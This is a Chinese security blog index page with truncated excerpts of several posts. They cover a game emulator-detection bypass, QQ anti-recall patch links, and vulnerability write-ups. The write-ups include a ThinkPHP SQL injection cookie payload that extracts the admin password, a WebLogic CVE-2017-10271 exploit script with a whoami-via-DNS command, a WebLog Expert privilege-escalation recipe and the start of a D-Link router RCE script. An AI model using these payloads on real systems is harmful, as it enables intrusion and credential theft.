• [5月8日]刺激战场过模拟器检测

    [5月8日]刺激战场过模拟器检测
    声明:内容是转载过来的。 一:卸载已安装的腾讯助手(必须) 确保原安装目录中没有TxGameAssistant文件夹存在 二:运行注册表清除 三:安装新助手必须安装到其他盘 例:原先安装在默认盘E盘 这次安装手动选择E盘以外的其他盘 四:安装完成之后等待助手自动安装游戏引擎 完成后 关闭助手 确保进程也没有残留 五:找到安装目录 删除AOW_Rootfs 和 UI 这两个文件夹 只保留AppMarket文...
    作者:unhonker| 发布:2018年5月08日 | 分类:技术文章 | 阅读:868次| 标签:
  • QQ防撤回补丁+TIM

    QQ防撤回补丁+TIM
    无意间在吾爱破解上面看到的,觉得好玩就转载过来了。 QQ9.0.1防撤回补丁:链接: https://pan.baidu.com/s/16mQDrI-i6LxY0v83tnCbIg 密码: ju4g TIM2.1.5防撤回补丁:链接: https://pan.baidu.com/s/1ubf4zHg8LNpoVvTV3_ov-w 密码: uu6p 解压密码:www.52pojie.cn
    作者:unhonker| 发布:2018年4月10日 | 分类:技术文章 | 阅读:771次| 标签:
  • WebLog Expert Enterprise 9.4 权限提升漏洞

    WebLog Expert Enterprise 9.4 权限提升漏洞
    Software Link: https://www.weblogexpert.com/download.htm Exploit: 1. Login as regular user where WebLog Expert and WebLog Expert Schedule Service are installed 2. Open WebLog Expert and then Schedule 3. Select Add, Next, choose ‘Sample – HTML’ under Profile, Next 4. Check ‘Run command…’ box, fill in ‘Com...
    作者:unhonker| 发布:2018年4月03日 | 分类:漏洞公布 | 阅读:3,801次| 标签:
  • Joomla内核SQL注入漏洞(CVE-2018-8045)分析

    Joomla内核SQL注入漏洞(CVE-2018-8045)分析
    我们先看下joomla官网怎么说的: https://developer.joomla.org/security-centre/723-20180301-core-sqli-vulnerability.html User Notes模块由于缺少变量类型转换,导致sql注入的产生。这个漏洞在3.8.6版本被解决。 漏洞介绍很模糊,单从介绍来看,根本不知道这个sql注入产生的位置。 但是既然是3.8.6版本解决的,那我们就来从3.8.6版本的update包中找找思路。 如下是gith...
    作者:unhonker| 发布:2018年3月29日 | 分类:漏洞公布 | 阅读:598次| 标签:
  • [转]第二届“强网杯”全国网络安全挑战赛web部分writeup

    [转]第二届“强网杯”全国网络安全挑战赛web部分writeup
    本文章转子互联网。 赛事介绍 为全面贯彻习主席关于网络安全和信息化工作的一系列重要指示精神,延揽储备锻炼网信领域优秀人才,提升国家网络空间安全能力水平,举办第二届“强网杯”全国网络安全挑战赛。该比赛是面向高等院校和国内信息安全企业的一次国家级网络安全赛事,旨在通过激烈的网络竞赛对抗,培养和提高国家网络安全保障能力和水平,发现网络安全领域优秀人才,提...
    作者:unhonker| 发布:2018年3月27日 | 分类:业界新闻, 技术文章 | 阅读:603次| 标签:
  • thinkphp3.2.3注入漏洞

    thinkphp3.2.3注入漏洞
    这个漏洞是基于thinkphp3.2.3开发引起的。 漏洞一 由于oauth_reg方法中调用了login来验证当前会员是否登陆,所以咱们需要注册一个会员帐户再利用该漏洞,这里玩注册用户名和密码均为test123的帐户,然后构造如下cookie: members_bind_info[keyid][0]=exp; members_bind_info[keyid][1]==1 or updatexml(0,concat(0xa,(SELECT password FROM xx_admin limit 1)),0)%23 mem...
    作者:unhonker| 发布:2018年3月05日 | 分类:漏洞公布 | 阅读:1,843次| 标签:
  • Dedecms任意用户登录

    Dedecms任意用户登录
    ##前台任意用户户登录 global $dsql; if($kp?me==-1){ $this->M_KeepTime = 3600 * 24 * 7; }else{ $this->M_KeepTime = $kp?me; } $formcache = FALSE; $this->M_ID = $this->GetNum(GetCookie("DedeUserID")); $this->M_LoginTime = GetCookie("DedeLoginTime"); $this->fields = array(); $this->isAdmin = FALSE;...
    作者:unhonker| 发布:2018年1月23日 | 分类:漏洞公布 | 阅读:1,109次| 标签:
  • Weblogic(CVE-2017-10271)漏洞Exp

    Weblogic(CVE-2017-10271)漏洞Exp
    文章作者:莫须有 命令格式:python3 CVE-2017-10271.py url command eg:python3 CVE-2017-10271.py http://test.cve “ping \`whoami\`.dnslog.cve # -*- coding: UTF-8 -*- ''' Created on 2017年12月23日 @author: 莫须有 CVE-2017-10271 EXP ''' import requests,sys headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 5.1; rv:5.0) ...
    作者:unhonker| 发布:2017年12月27日 | 分类:漏洞公布 | 阅读:2,286次| 标签:,
  • D-Link DIR8xx 远程代码执行漏洞

    D-Link DIR8xx 远程代码执行漏洞
    脚本下载: hnap import requests as rq import struct IP = "192.168.0.1" PORT = "80" # Can differ in different version of routers and versions of firmware # SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01 SYSTEM_ADDRESS = 0x1B50C # DIR-890L_REVA_FIRMWARE_1.10.B07 def _str(address): ...
    作者:unhonker| 发布:2017年9月16日 | 分类:漏洞公布 | 阅读:1,981次| 标签: